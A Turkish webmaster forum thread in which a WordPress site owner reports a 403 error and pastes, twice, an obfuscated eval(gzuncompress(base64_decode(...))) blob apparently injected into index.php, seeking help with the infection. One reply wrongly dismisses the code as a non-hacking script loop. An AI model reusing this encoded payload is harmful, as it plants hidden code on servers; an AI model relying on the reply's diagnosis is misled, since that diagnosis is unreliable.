403 Access Denied

23-10-2015, 06:44:43

#1

umutcanyildirim

Selam arkadaşlar,

Wordpress tabanlı sitemde bugün ilginç bir şekilde bu hatayı aldım, daha önce 403 hatasıyla hiç karşılaşmamıştım. Hostla alakalı bir sorun olduğunu düşündüm, ancak teknik servis index.php dosyasına eval döngüsü atılmış olduğunu ve bu tür dosyaların hacklenmiş olabileceğini söyledi.

-eval döngüsü nasıl atılabilir? Ve buna karşı nasıl önlem alabilirim?

-Bu hackin chmod değerleriyle alakası olabilir mi?

-wp-admin'deki install.php dosyasını kaldırmalı mıyım?

Şimdiden teşekkürler.

--R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 06:44:43 -->-> Daha önceki mesaj 05:01:01 --

index.php sayfasında şu kodu buldum;

Alıntı

eval(gzuncompress(base64_decode('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')));
/**

wordpressin resmi sitesinden wp'yi indirdim ve index.php sayfasını değiştirdim; arkadaşlar böyle bir hacking olayıyla karşılaşan daha önce oldu mu? var mı bir tavsiyeniz?
23-10-2015, 06:44:50

#2

rowCount

umutcanyildirim adlı üyeden alıntı: mesajı görüntüle

Selam arkadaşlar,

Wordpress tabanlı sitemde bugün ilginç bir şekilde bu hatayı aldım, daha önce 403 hatasıyla hiç karşılaşmamıştım. Hostla alakalı bir sorun olduğunu düşündüm, ancak teknik servis index.php dosyasına eval döngüsü atılmış olduğunu ve bu tür dosyaların hacklenmiş olabileceğini söyledi.

-eval döngüsü nasıl atılabilir? Ve buna karşı nasıl önlem alabilirim?

-Bu hackin chmod değerleriyle alakası olabilir mi?

-wp-admin'deki install.php dosyasını kaldırmalı mıyım?

Şimdiden teşekkürler.

Merhabalar,

Hiçbir hacker dosyalara eval kodu ekliyerek siteyi boşa çevirmez. Script kaynaklı hatalar şimdi vuruyor olabilir misal ilk kuruldugunda sorun olmayabilir biraz ziyaretçi girmeye başladıgında cpu şişmeye başliyor ve sorgusuz eval döngüsüne giriyor.

Chmodlar önemli bi fonksiyondur konfigrasyona uygun izinleri vermeniz gerekmektedir.

wordpress kurulumunda wp-admin klasorunde install.php dosyasını kurulumdan sonra silinicek diyorsa mutlaka silin aynı zamanda dosyada base64 ile şifrelenmiş dosyayı tüm kodları ile paste bin'e atarsanız decode edelim ne olduguu ortaya cıkar berki hacklink yapan kişilerin işidir

eğer profesyonel bir yardım almak isterseniz

https://www.r10.net/site-guvenligi-am...k-hizmeti.html

https://www.r10.net/wordpress-seo-guv...temizleme.html

23-10-2015, 07:09:28

ynR adlı üyeden alıntı: mesajı görüntüle

Merhabalar,

Hiçbir hacker dosyalara eval kodu ekliyerek siteyi boşa çevirmez. Script kaynaklı hatalar şimdi vuruyor olabilir misal ilk kuruldugunda sorun olmayabilir biraz ziyaretçi girmeye başladıgında cpu şişmeye başliyor ve sorgusuz eval döngüsüne giriyor.

Chmodlar önemli bi fonksiyondur konfigrasyona uygun izinleri vermeniz gerekmektedir.

wordpress kurulumunda wp-admin klasorunde install.php dosyasını kurulumdan sonra silinicek diyorsa mutlaka silin aynı zamanda dosyada base64 ile şifrelenmiş dosyayı tüm kodları ile paste bin'e atarsanız decode edelim ne olduguu ortaya cıkar berki hacklink yapan kişilerin işidir

eğer profesyonel bir yardım almak isterseniz

https://www.r10.net/site-guvenligi-am...k-hizmeti.html

https://www.r10.net/wordpress-seo-guv...temizleme.html

eval(gzuncompress(base64_decode('eNqFWGtvE1ca/is0ygdbFDRnxjNjk3UlQmynFpkUx/FlmMqai13HGTuWbxkHIWi1LYSURYFdUcSXRUsQkEABiaKqikRFS5YCq0BhgaVK/8q+zxnngtZdQMT2+L0+7/M+5wTbNZvNXYW762u3rr+88OiLI/XGVMdsFXc1W2Zryh4s3L26uvT8+ZD/cVepXbNbUzO1XYXL8yvn3wYGCw9e/PnU32/+enX9h+CRqVLgg2bRLe3bt+kX3Od/Lnz39eW1lXurfw0Eh4o1Z6o01Ci22o3aLmv/RFEJFUaK9vhILPCu8+Gd0T8NDh19t7YdxWxHP/JuiKjZaJjdwEDhZ8MzVcOznIev5g1REo5/OxD9aODgbNTwJGfgwwGDSaohCsrtc4//hW/oUcEQFeHumiFJyuKVe3g4aXiKZXiykspMZug1lIkbgsoyk9PTvTCFRxeurp3hobtkHDYERaRXlo3X7GqcjMKUiIlu2Uq4cyXDC1FNstgp0ruwWykaTFS1pokX2eVfewaTQxQhVHUFg4UkeuvEw7bBmJB0dVjIBlMEW0QhbT3nVchKzqU6TiJTKSW0poUSmOGpgj5KP8OKmaPw4oxdjbTyVIxQDudh4tKXql2lEiMUqpcrROUysUPpBJW8lIqZjZO5J6vkgqBKMUEV2c3SqCZbNQSmj1S4IlHdcgSl6aPedD43zI1Rb4ZcBY6JjN5KCbljjeplKkVMZOgjAKnrVYOpAsuL8TZVolDlskkVKmIt1bH8agCLKpdG6x0rESHzUGgUPvRQzGepDUYmAvykZBlRJeY6CZ16IQRZnYolMOa4W7KMF0CK3EgjEQ4hJewk4tPollAQMCSy8GYJuFkb3cXbHFuPyvfKVi1VzteIFKpJQyhbueF6XnSbKJkj1C75VQtKBQyQwCIhTxDQd6UEpizYfAwh9Jug4hXFgYvbNHMIGwIdwsNddJRFnW0zpwFUskcKKYLpz3HueNPIkfXqtoQuKW5IRypVoG4kMd6kjG4xEcfIebeRMI+SEf0XFEtgUNNdS8IMy/CTPDgTtoSywN0wSl7vqFbnU+EsJ9ioYEnghFdM8JEzhjGl6c/dJWLWHZAh3kRGME3s8poZdgTLYYIeimKPJusWJ+4sWTKKzBRZzyVpfEQvhPUkOWyLXt3KZnzsMDoGOonMpbH0Rk0Ii3pueCbPAaLu3TYVoyQ0CihZIt8inY8KtCIoXbvmCiZftI6VA98q/mKG9arb7u2HmuErYVVdJZ91wCOiDg05DHykzAzfFafLSeSJlugJ/G0Seawa8SSLwAL2TrFnORuxiNIWTmgGmAuKTCxOlvNSqmviIwuDCVWPgWL0GS5h1ycysQZkEAFCLgnyWJhfGVXJ2ThYL6Iwt03rAwDznO8+IA7yO9lNbkm9bRP4hooZiAOGwpnt1oo5b8qBjGiz+VwyTMsx5atKHUlqHpaduNexq6z3RNL9sanhZh6KQeLl46kk4k2dswi0cRIgNLgGaslyquPLlK8HmgD90rOa4O9gmI9V5jXWkmWaB7ooJeIiOhdTZbuW2uS4JaWgfnXY8pUGWUGnbAp90trOAojRYSK/DgaBGhxlGCs8od6l3UVAibgZMl3SXy9EAqFiHCw3TMTxuRkhiIdnQG0aBKNtQR4N40QOdJvBOGgpZf84oAo6KDSbwURFCV5iaafk2VIKs7YSHgEgC74ulDFawkBifPdzbthOxGWd/vGhAscO5IamR3JZ9hmgFMfqB4HPdLR3BJ4xvAh7dcMQZXVh8xg8s2iITH723Rd4MAF2pyYncZZFaBlpcWjCmYmcEOfHBQnTpDzJT0/PlJ9TXvUivbPobGVbR2hGS7MUGOd7yan4xyigsLBwffnEEjcTEJur5LT/jjiFTDJUKU3P0azMvb65P3/32LkLTx/BUatQAlXSRqCmgja3H4oMcoSSYNFYlSvg2NyYBz2qck6NpYmSSkSrxLp62u6SIqhYD7mrc632/AdMYOI4Dv2ku+PBiD07JuZ5HV8akiCtrBF20gtDFFWDZJ6XNJeXdX5uV7SRzFR+jlqOhMbTmYrPGbQiYRpQRGdkEiwaT+/nokUPqAaGozaiwfTQ7Hja5ume/nZufeE45SRu2sJxZMrTPpjZSPsTrjqQFBwhCkbV5ISUG2ArVyhwnGGbWUPP4foS6V151I3vVwzPIXF1hBP8KkNiS1h1+JonK3qaBqHKIIwHzlrWVRqwzTsmF0MiShAEa29XuC+KbrnFnMP1BKfGIZ7p2GVcrJ4t08XMMX+kvIwiMN+FoHBo+TIkiKKQ1jAcqkCePlT19Q2ZQrJfsBfmlZ5F3ktw73Uoh2YBA4tGe2bCZXDwxq0nK2jyMUxxPMpiV8/GWzDaoECl1ZuLhKf06hoMnFyyiW9unF3+7TT/euFzP4ccSkQq+RydLmJI+Xg/rn+UiO6oRwcL68eWF5/+dPPV66Vos9UoNGJ11zxQDGxfsuk+7F+fe/fSVbqUfkM30uCHfW2+oksp1VSk7wcLE7FUJpY63NeQX1iJEeoG9WAS2pY6EKSLM93LP2nEPiuMmekDo/3roPgRuhcz3F6RZruHYHDfjov2m59vvz1G1/7T1x8/3QgeGSzcv3Pv3KMrZ6N9o55ZJC3xzNLCQHCoNNMgv4Wb5188f/3wUjQwVWsFU+OTmhMQdtPf4ND2l3+aSKcOFrWtNHt6xm1tJCDsFeXd7/7Y6brbD9yYaddgq+z8o+5+7wNqdqulvVG73AiUi55TPLBZyuHtTJ/u/d9nuwN7BFHZIzCKHFIIev7bDnXe+3VnK/YQ0eTlybtL365HJxtuTDsw7sQC/3+4ZxZPE8cZyTBGOli4+O9Td168+Wr5whWEKFKIkfeFWHpOS1i6iPX8vBfl15X5p69Xl59FJ1MHY5o94xQD7+MYk3yZ9gNce7x0fD66SYy+LiTQREUZGk2ayAaC8Lv+lyu3Hl7uT5svH5AC2eryi/NcQ2F+68TqrbffRXv59vZ18xXxvi+Hwb2bOfob34P8fL/ypidzMN/Eoq8DxO4HQk5YOb9OPvIyBA5e25vSP9Gxyxukcv/58fYiN/en3j8FHcDzFDwiIsElbr49ZWB9cuOf16/98ubkarQ05cYKnxVbhQMztVZMS08ENjECWnderj1ZOv31wi/RSnOmht+uZzi/tgPAam3+9N8WHv7jp1PRHR57PjryR7Ud9xUUKvNk5d7jgeDRPzAmNXGKv6/S5hcXH5CSBo9CgnYk/CBaa7tucN9ozByJNfqzxtfc3xdIuhmHYsublsqbam39T4L/c+i/SuowTw==')));
/**

çok teşekkürler, install.php'ye htaccess üzerinden erişimi engelledim onun şuanda sorun yaratacağını zannetmiyorum. index.php dosyasında nasıl böyle bir eval kodu -artık neyse- çıkıyor bunu anlamıyorum. Yukarıdaki kode index.php'de bulunan kod. tamamını kopyaladım.